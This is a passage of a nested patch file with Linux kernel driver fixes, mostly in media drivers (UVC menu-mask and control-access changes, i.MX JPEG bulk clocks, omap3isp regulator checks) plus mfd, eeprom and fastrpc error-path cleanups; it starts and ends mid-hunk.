+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select V4L2_MEM2MEM_DEV
+-	select MTK_MMSYS
+-	select VIDEO_MEDIATEK_VPU
+-	select MTK_CMDQ
+-	select MTK_SCP
+ 	default n
+ 	help
+ 	    It is a v4l2 driver and present in MediaTek MT8183 SoC.
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index 2d1f6ae9f0802..97edcd9d1c817 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -207,8 +207,8 @@ static int mdp_probe(struct platform_device *pdev)
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+-		if (!mdp->mdp_mutex[i]) {
+-			ret = -ENODEV;
++		if (IS_ERR(mdp->mdp_mutex[i])) {
++			ret = PTR_ERR(mdp->mdp_mutex[i]);
+ 			goto err_free_mutex;
+ 		}
+ 	}
+@@ -289,7 +289,8 @@ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+ err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		mtk_mutex_put(mdp->mdp_mutex[i]);
++		if (!IS_ERR_OR_NULL(mdp->mdp_mutex[i]))
++			mtk_mutex_put(mdp->mdp_mutex[i]);
+ err_destroy_device:
+ 	kfree(mdp);
+ err_return:
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+index 32fd04a3d8bb7..81a44702a5413 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+@@ -2202,19 +2202,12 @@ static int mxc_jpeg_probe(struct platform_device *pdev)
+ 	jpeg->mode = mode;
+ 
+ 	/* Get clocks */
+-	jpeg->clk_ipg = devm_clk_get(dev, "ipg");
+-	if (IS_ERR(jpeg->clk_ipg)) {
+-		dev_err(dev, "failed to get clock: ipg\n");
+-		ret = PTR_ERR(jpeg->clk_ipg);
+-		goto err_clk;
+-	}
+-
+-	jpeg->clk_per = devm_clk_get(dev, "per");
+-	if (IS_ERR(jpeg->clk_per)) {
+-		dev_err(dev, "failed to get clock: per\n");
+-		ret = PTR_ERR(jpeg->clk_per);
++	ret = devm_clk_bulk_get_all(&pdev->dev, &jpeg->clks);
++	if (ret < 0) {
++		dev_err(dev, "failed to get clock\n");
+ 		goto err_clk;
+ 	}
++	jpeg->num_clks = ret;
+ 
+ 	ret = mxc_jpeg_attach_pm_domains(jpeg);
+ 	if (ret < 0) {
+@@ -2311,32 +2304,20 @@ static int mxc_jpeg_runtime_resume(struct device *dev)
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = clk_prepare_enable(jpeg->clk_ipg);
+-	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: ipg\n");
+-		goto err_ipg;
+-	}
+-
+-	ret = clk_prepare_enable(jpeg->clk_per);
++	ret = clk_bulk_prepare_enable(jpeg->num_clks, jpeg->clks);
+ 	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: per\n");
+-		goto err_per;
++		dev_err(dev, "failed to enable clock\n");
++		return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err_per:
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-err_ipg:
+-	return ret;
+ }
+ 
+ static int mxc_jpeg_runtime_suspend(struct device *dev)
+ {
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-	clk_disable_unprepare(jpeg->clk_per);
++	clk_bulk_disable_unprepare(jpeg->num_clks, jpeg->clks);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+index c508d41a906f4..d742b638ddc93 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+@@ -114,8 +114,8 @@ struct mxc_jpeg_dev {
+ 	spinlock_t			hw_lock; /* hardware access lock */
+ 	unsigned int			mode;
+ 	struct mutex			lock; /* v4l2 ioctls serialization */
+-	struct clk			*clk_ipg;
+-	struct clk			*clk_per;
++	struct clk_bulk_data		*clks;
++	int				num_clks;
+ 	struct platform_device		*pdev;
+ 	struct device			*dev;
+ 	void __iomem			*base_reg;
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 451a4c9b3d30d..04baa80494c66 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -429,7 +429,8 @@ static void csiphy_gen2_config_lanes(struct csiphy_device *csiphy,
+ 		array_size = ARRAY_SIZE(lane_regs_sm8250[0]);
+ 		break;
+ 	default:
+-		unreachable();
++		WARN(1, "unknown cspi version\n");
++		return;
+ 	}
+ 
+ 	for (l = 0; l < 5; l++) {
+diff --git a/drivers/media/platform/ti/cal/cal.c b/drivers/media/platform/ti/cal/cal.c
+index 56b61c0583cf8..1236215ec70eb 100644
+--- a/drivers/media/platform/ti/cal/cal.c
++++ b/drivers/media/platform/ti/cal/cal.c
+@@ -1050,8 +1050,10 @@ static struct cal_ctx *cal_ctx_create(struct cal_dev *cal, int inst)
+ 	ctx->cport = inst;
+ 
+ 	ret = cal_ctx_v4l2_init(ctx);
+-	if (ret)
++	if (ret) {
++		kfree(ctx);
+ 		return NULL;
++	}
+ 
+ 	return ctx;
+ }
+diff --git a/drivers/media/platform/ti/omap3isp/isp.c b/drivers/media/platform/ti/omap3isp/isp.c
+index 24d2383400b0a..11ae479ee89c8 100644
+--- a/drivers/media/platform/ti/omap3isp/isp.c
++++ b/drivers/media/platform/ti/omap3isp/isp.c
+@@ -2308,7 +2308,16 @@ static int isp_probe(struct platform_device *pdev)
+ 
+ 	/* Regulators */
+ 	isp->isp_csiphy1.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy1");
++	if (IS_ERR(isp->isp_csiphy1.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy1.vdd);
++		goto error;
++	}
++
+ 	isp->isp_csiphy2.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy2");
++	if (IS_ERR(isp->isp_csiphy2.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy2.vdd);
++		goto error;
++	}
+ 
+ 	/* Clocks
+ 	 *
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 2c7a805289e7b..30e650edaea8a 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -161,8 +161,11 @@ static int vidioc_enum_framesizes(struct file *file, void *priv,
+ 	}
+ 
+ 	/* For non-coded formats check if postprocessing scaling is possible */
+-	if (fmt->codec_mode == HANTRO_MODE_NONE && hantro_needs_postproc(ctx, fmt)) {
+-		return hanto_postproc_enum_framesizes(ctx, fsize);
++	if (fmt->codec_mode == HANTRO_MODE_NONE) {
++		if (hantro_needs_postproc(ctx, fmt))
++			return hanto_postproc_enum_framesizes(ctx, fsize);
++		else
++			return -ENOTTY;
+ 	} else if (fsize->index != 0) {
+ 		vpu_debug(0, "invalid frame size index (expected 0, got %d)\n",
+ 			  fsize->index);
+diff --git a/drivers/media/rc/ene_ir.c b/drivers/media/rc/ene_ir.c
+index e09270916fbca..11ee21a7db8f0 100644
+--- a/drivers/media/rc/ene_ir.c
++++ b/drivers/media/rc/ene_ir.c
+@@ -1106,6 +1106,8 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 	struct ene_device *dev = pnp_get_drvdata(pnp_dev);
+ 	unsigned long flags;
+ 
++	rc_unregister_device(dev->rdev);
++	del_timer_sync(&dev->tx_sim_timer);
+ 	spin_lock_irqsave(&dev->hw_lock, flags);
+ 	ene_rx_disable(dev);
+ 	ene_rx_restore_hw_buffer(dev);
+@@ -1113,7 +1115,6 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 
+ 	free_irq(dev->irq, dev);
+ 	release_region(dev->hw_io, ENE_IO_SIZE);
+-	rc_unregister_device(dev->rdev);
+ 	kfree(dev);
+ }
+ 
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index fe9c7b3a950e8..6f443c542c6da 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,6 +179,7 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
++		cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index c95a2229f4fa9..44b0cfb8ee1c7 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
+@@ -525,7 +526,8 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+ 		.data_type	= UVC_CTRL_DATA_TYPE_BITMASK,
+ 		.menu_info	= exposure_auto_controls,
+-		.menu_count	= ARRAY_SIZE(exposure_auto_controls),
++		.menu_mask	= GENMASK(V4L2_EXPOSURE_APERTURE_PRIORITY,
++					  V4L2_EXPOSURE_AUTO),
+ 		.slave_ids	= { V4L2_CID_EXPOSURE_ABSOLUTE, },
+ 	},
+ 	{
+@@ -721,32 +723,53 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 	},
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc11[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls) - 1,
+-	},
++const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_50HZ),
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc15[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls),
+-	},
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc11 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc11[] = {
++	&uvc_ctrl_power_line_mapping_uvc11,
++	NULL, /* Sentinel */
++};
++
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc15 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_AUTO,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc15[] = {
++	&uvc_ctrl_power_line_mapping_uvc15,
++	NULL, /* Sentinel */
+ };
+ 
+ /* ------------------------------------------------------------------------
+@@ -975,7 +998,9 @@ static s32 __uvc_ctrl_get_value(struct uvc_control_mapping *mapping,
+ 		const struct uvc_menu_info *menu = mapping->menu_info;
+ 		unsigned int i;
+ 
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == value) {
+ 				value = i;
+ 				break;
+@@ -1085,11 +1110,28 @@ static int uvc_query_v4l2_class(struct uvc_video_chain *chain, u32 req_id,
+ 	return 0;
+ }
+ 
++/*
++ * Check if control @v4l2_id can be accessed by the given control @ioctl
++ * (VIDIOC_G_EXT_CTRLS, VIDIOC_TRY_EXT_CTRLS or VIDIOC_S_EXT_CTRLS).
++ *
++ * For set operations on slave controls, check if the master's value is set to
++ * manual, either in the others controls set in the same ioctl call, or from
++ * the master's current value. This catches VIDIOC_S_EXT_CTRLS calls that set
++ * both the master and slave control, such as for instance setting
++ * auto_exposure=1, exposure_time_absolute=251.
++ */
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read)
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl)
+ {
++	struct uvc_control_mapping *master_map = NULL;
++	struct uvc_control *master_ctrl = NULL;
+ 	struct uvc_control_mapping *mapping;
+ 	struct uvc_control *ctrl;
++	bool read = ioctl == VIDIOC_G_EXT_CTRLS;
++	s32 val;
++	int ret;
++	int i;
+ 
+ 	if (__uvc_query_v4l2_class(chain, v4l2_id, 0) >= 0)
+ 		return -EACCES;
+@@ -1104,6 +1146,29 @@ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+ 	if (!(ctrl->info.flags & UVC_CTRL_FLAG_SET_CUR) && !read)
+ 		return -EACCES;
+ 
++	if (ioctl != VIDIOC_S_EXT_CTRLS || !mapping->master_id)
++		return 0;
++
++	/*
++	 * Iterate backwards in cases where the master control is accessed
++	 * multiple times in the same ioctl. We want the last value.
++	 */
++	for (i = ctrls->count - 1; i >= 0; i--) {
++		if (ctrls->controls[i].id == mapping->master_id)
++			return ctrls->controls[i].value ==
++					mapping->master_manual ? 0 : -EACCES;
++	}
++
++	__uvc_find_control(ctrl->entity, mapping->master_id, &master_map,
++			   &master_ctrl, 0);
++
++	if (!master_ctrl || !(master_ctrl->info.flags & UVC_CTRL_FLAG_GET_CUR))
++		return 0;
++
++	ret = __uvc_ctrl_get(chain, master_ctrl, master_map, &val);
++	if (ret >= 0 && val != mapping->master_manual)
++		return -EACCES;
++
+ 	return 0;
+ }
+ 
+@@ -1169,12 +1234,14 @@ static int __uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+ 
+ 	switch (mapping->v4l2_type) {
+ 	case V4L2_CTRL_TYPE_MENU:
+-		v4l2_ctrl->minimum = 0;
+-		v4l2_ctrl->maximum = mapping->menu_count - 1;
++		v4l2_ctrl->minimum = ffs(mapping->menu_mask) - 1;
++		v4l2_ctrl->maximum = fls(mapping->menu_mask) - 1;
+ 		v4l2_ctrl->step = 1;
+ 
+ 		menu = mapping->menu_info;
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == v4l2_ctrl->default_value) {
+ 				v4l2_ctrl->default_value = i;
+ 				break;
+@@ -1289,7 +1356,7 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 		goto done;
+ 	}
+ 
+-	if (query_menu->index >= mapping->menu_count) {
++	if (!test_bit(query_menu->index, &mapping->menu_mask)) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+@@ -1797,8 +1864,13 @@ int uvc_ctrl_set(struct uvc_fh *handle,
+ 		break;
+ 
+ 	case V4L2_CTRL_TYPE_MENU:
+-		if (xctrl->value < 0 || xctrl->value >= mapping->menu_count)
++		if (xctrl->value < (ffs(mapping->menu_mask) - 1) ||
++		    xctrl->value > (fls(mapping->menu_mask) - 1))
+ 			return -ERANGE;
++
++		if (!test_bit(xctrl->value, &mapping->menu_mask))
++			return -EINVAL;
++
+ 		value = mapping->menu_info[xctrl->value].value;
+ 
+ 		/*
+@@ -2237,7 +2309,7 @@ static int __uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
+ 
+ 	INIT_LIST_HEAD(&map->ev_subs);
+ 
+-	size = sizeof(*mapping->menu_info) * mapping->menu_count;
++	size = sizeof(*mapping->menu_info) * fls(mapping->menu_mask);
+ 	map->menu_info = kmemdup(mapping->menu_info, size, GFP_KERNEL);
+ 	if (map->menu_info == NULL) {
+ 		kfree(map->name);
+@@ -2421,8 +2493,7 @@ static void uvc_ctrl_prune_entity(struct uvc_device *dev,
+ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 			       struct uvc_control *ctrl)
+ {
+-	const struct uvc_control_mapping *mappings;
+-	unsigned int num_mappings;
++	const struct uvc_control_mapping **mappings;
+ 	unsigned int i;
+ 
+ 	/*
+@@ -2489,16 +2560,11 @@ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 	}
+ 
+ 	/* Finally process version-specific mappings. */
+-	if (chain->dev->uvc_version < 0x0150) {
+-		mappings = uvc_ctrl_mappings_uvc11;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc11);
+-	} else {
+-		mappings = uvc_ctrl_mappings_uvc15;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc15);
+-	}
++	mappings = chain->dev->uvc_version < 0x0150
++		 ? uvc_ctrl_mappings_uvc11 : uvc_ctrl_mappings_uvc15;
+ 
+-	for (i = 0; i < num_mappings; ++i) {
+-		const struct uvc_control_mapping *mapping = &mappings[i];
++	for (i = 0; mappings[i]; ++i) {
++		const struct uvc_control_mapping *mapping = mappings[i];
+ 
+ 		if (uvc_entity_match_guid(ctrl->entity, mapping->entity) &&
+ 		    ctrl->info.selector == mapping->selector)
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index 215fb483efb00..abfe735f6ea30 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/atomic.h>
++#include <linux/bits.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -2373,23 +2374,6 @@ MODULE_PARM_DESC(timeout, "Streaming control requests timeout");
+  * Driver initialization and cleanup
+  */
+ 
+-static const struct uvc_menu_info power_line_frequency_controls_limited[] = {
+-	{ 1, "50 Hz" },
+-	{ 2, "60 Hz" },
+-};
+-
+-static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
+-	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-	.entity		= UVC_GUID_UVC_PROCESSING,
+-	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-	.size		= 2,
+-	.offset		= 0,
+-	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-	.menu_info	= power_line_frequency_controls_limited,
+-	.menu_count	= ARRAY_SIZE(power_line_frequency_controls_limited),
+-};
+-
+ static const struct uvc_device_info uvc_ctrl_power_line_limited = {
+ 	.mappings = (const struct uvc_control_mapping *[]) {
+ 		&uvc_ctrl_power_line_mapping_limited,
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index f4d4c33b6dfbd..0774a11360c03 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bits.h>
+ #include <linux/compat.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -80,7 +81,7 @@ static int uvc_ioctl_ctrl_map(struct uvc_video_chain *chain,
+ 			goto free_map;
+ 		}
+ 
+-		map->menu_count = xmap->menu_count;
++		map->menu_mask = GENMASK(xmap->menu_count - 1, 0);
+ 		break;
+ 
+ 	default:
+@@ -1020,8 +1021,7 @@ static int uvc_ctrl_check_access(struct uvc_video_chain *chain,
+ 	int ret = 0;
+ 
+ 	for (i = 0; i < ctrls->count; ++ctrl, ++i) {
+-		ret = uvc_ctrl_is_accessible(chain, ctrl->id,
+-					    ioctl == VIDIOC_G_EXT_CTRLS);
++		ret = uvc_ctrl_is_accessible(chain, ctrl->id, ctrls, ioctl);
+ 		if (ret)
+ 			break;
+ 	}
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index df93db259312e..1227ae63f85b7 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -117,7 +117,7 @@ struct uvc_control_mapping {
+ 	u32 data_type;
+ 
+ 	const struct uvc_menu_info *menu_info;
+-	u32 menu_count;
++	unsigned long menu_mask;
+ 
+ 	u32 master_id;
+ 	s32 master_manual;
+@@ -728,6 +728,7 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags);
+ void uvc_status_stop(struct uvc_device *dev);
+ 
+ /* Controls */
++extern const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited;
+ extern const struct v4l2_subscribed_event_ops uvc_ctrl_sub_ev_ops;
+ 
+ int uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+@@ -761,7 +762,8 @@ static inline int uvc_ctrl_rollback(struct uvc_fh *handle)
+ int uvc_ctrl_get(struct uvc_video_chain *chain, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_set(struct uvc_fh *handle, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read);
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl);
+ 
+ int uvc_xu_ctrl_query(struct uvc_video_chain *chain,
+ 		      struct uvc_xu_control_query *xqry);
+diff --git a/drivers/media/v4l2-core/v4l2-h264.c b/drivers/media/v4l2-core/v4l2-h264.c
+index 72bd64f651981..c00197d095e75 100644
+--- a/drivers/media/v4l2-core/v4l2-h264.c
++++ b/drivers/media/v4l2-core/v4l2-h264.c
+@@ -305,6 +305,8 @@ static const char *format_ref_list_p(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+@@ -343,6 +345,8 @@ static const char *format_ref_list_b(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-jpeg.c b/drivers/media/v4l2-core/v4l2-jpeg.c
+index c2513b775f6a7..94435a7b68169 100644
+--- a/drivers/media/v4l2-core/v4l2-jpeg.c
++++ b/drivers/media/v4l2-core/v4l2-jpeg.c
+@@ -460,7 +460,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	/* Check for "Adobe\0" in Ap1..6 */
+ 	if (stream->curr + 6 > stream->end ||
+ 	    strncmp(stream->curr, "Adobe\0", 6))
+-		return -EINVAL;
++		return jpeg_skip(stream, lp - 2);
+ 
+ 	/* get to Ap12 */
+ 	ret = jpeg_skip(stream, 11);
+@@ -474,7 +474,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	*tf = ret;
+ 
+ 	/* skip the rest of the segment, this ensures at least it is complete */
+-	skip = lp - 2 - 11;
++	skip = lp - 2 - 11 - 1;
+ 	return jpeg_skip(stream, skip);
+ }
+ 
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 9940e2724c05d..9da8235cb6900 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -15,6 +15,7 @@ config MFD_CS5535
+ 	tristate "AMD CS5535 and CS5536 southbridge core functions"
+ 	select MFD_CORE
+ 	depends on PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This is the core driver for CS5535/CS5536 MFD functions.  This is
+ 	  necessary for using the board's GPIO and MFGPT functionality.
+diff --git a/drivers/mfd/pcf50633-adc.c b/drivers/mfd/pcf50633-adc.c
+index 5cd653e615125..191b1bc6141c2 100644
+--- a/drivers/mfd/pcf50633-adc.c
++++ b/drivers/mfd/pcf50633-adc.c
+@@ -136,6 +136,7 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 			     void *callback_param)
+ {
+ 	struct pcf50633_adc_request *req;
++	int ret;
+ 
+ 	/* req is freed when the result is ready, in interrupt handler */
+ 	req = kmalloc(sizeof(*req), GFP_KERNEL);
+@@ -147,7 +148,11 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 	req->callback = callback;
+ 	req->callback_param = callback_param;
+ 
+-	return adc_enqueue_request(pcf, req);
++	ret = adc_enqueue_request(pcf, req);
++	if (ret)
++		kfree(req);
++
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(pcf50633_adc_async_read);
+ 
+diff --git a/drivers/misc/eeprom/idt_89hpesx.c b/drivers/misc/eeprom/idt_89hpesx.c
+index bb3ed352b95f9..367054e0ced4e 100644
+--- a/drivers/misc/eeprom/idt_89hpesx.c
++++ b/drivers/misc/eeprom/idt_89hpesx.c
+@@ -1566,12 +1566,20 @@ static struct i2c_driver idt_driver = {
+  */
+ static int __init idt_init(void)
+ {
++	int ret;
++
+ 	/* Create Debugfs directory first */
+ 	if (debugfs_initialized())
+ 		csr_dbgdir = debugfs_create_dir("idt_csr", NULL);
+ 
+ 	/* Add new i2c-device driver */
+-	return i2c_add_driver(&idt_driver);
++	ret = i2c_add_driver(&idt_driver);
++	if (ret) {
++		debugfs_remove_recursive(csr_dbgdir);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(idt_init);
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 80811e852d8fd..02d26160c64e6 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2127,7 +2127,18 @@ static int fastrpc_rpmsg_probe(struct rpmsg_device *rpdev)
+ 	data->domain_id = domain_id;
+ 	data->rpdev = rpdev;
+ 
+-	return of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	err = of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	if (err)
++		goto populate_error;
++
++	return 0;
++
++populate_error:
++	if (data->fdevice)
++		misc_deregister(&data->fdevice->miscdev);
++	if (data->secure_fdevice)
++		misc_deregister(&data->secure_fdevice->miscdev);
++
+ fdev_error:
+ 	kfree(data);
+ 	return err;
+diff --git a/drivers/misc/habanalabs/common/command_submission.c b/drivers/misc/habanalabs/common/command_submission.c
+index fa05770865c65..1071bf492e423 100644
+--- a/drivers/misc/habanalabs/common/command_submission.c
++++ b/drivers/misc/habanalabs/common/command_submission.c
+@@ -3091,19 +3091,18 @@ start_over:
+ 			goto start_over;
+ 		}
+ 	} else {
++		/* Fill up the new registration node info */
++		requested_offset_record->ts_reg_info.buf = buf;
++		requested_offset_record->ts_reg_info.cq_cb = cq_cb;
++		requested_offset_record->ts_reg_info.timestamp_kernel_addr =
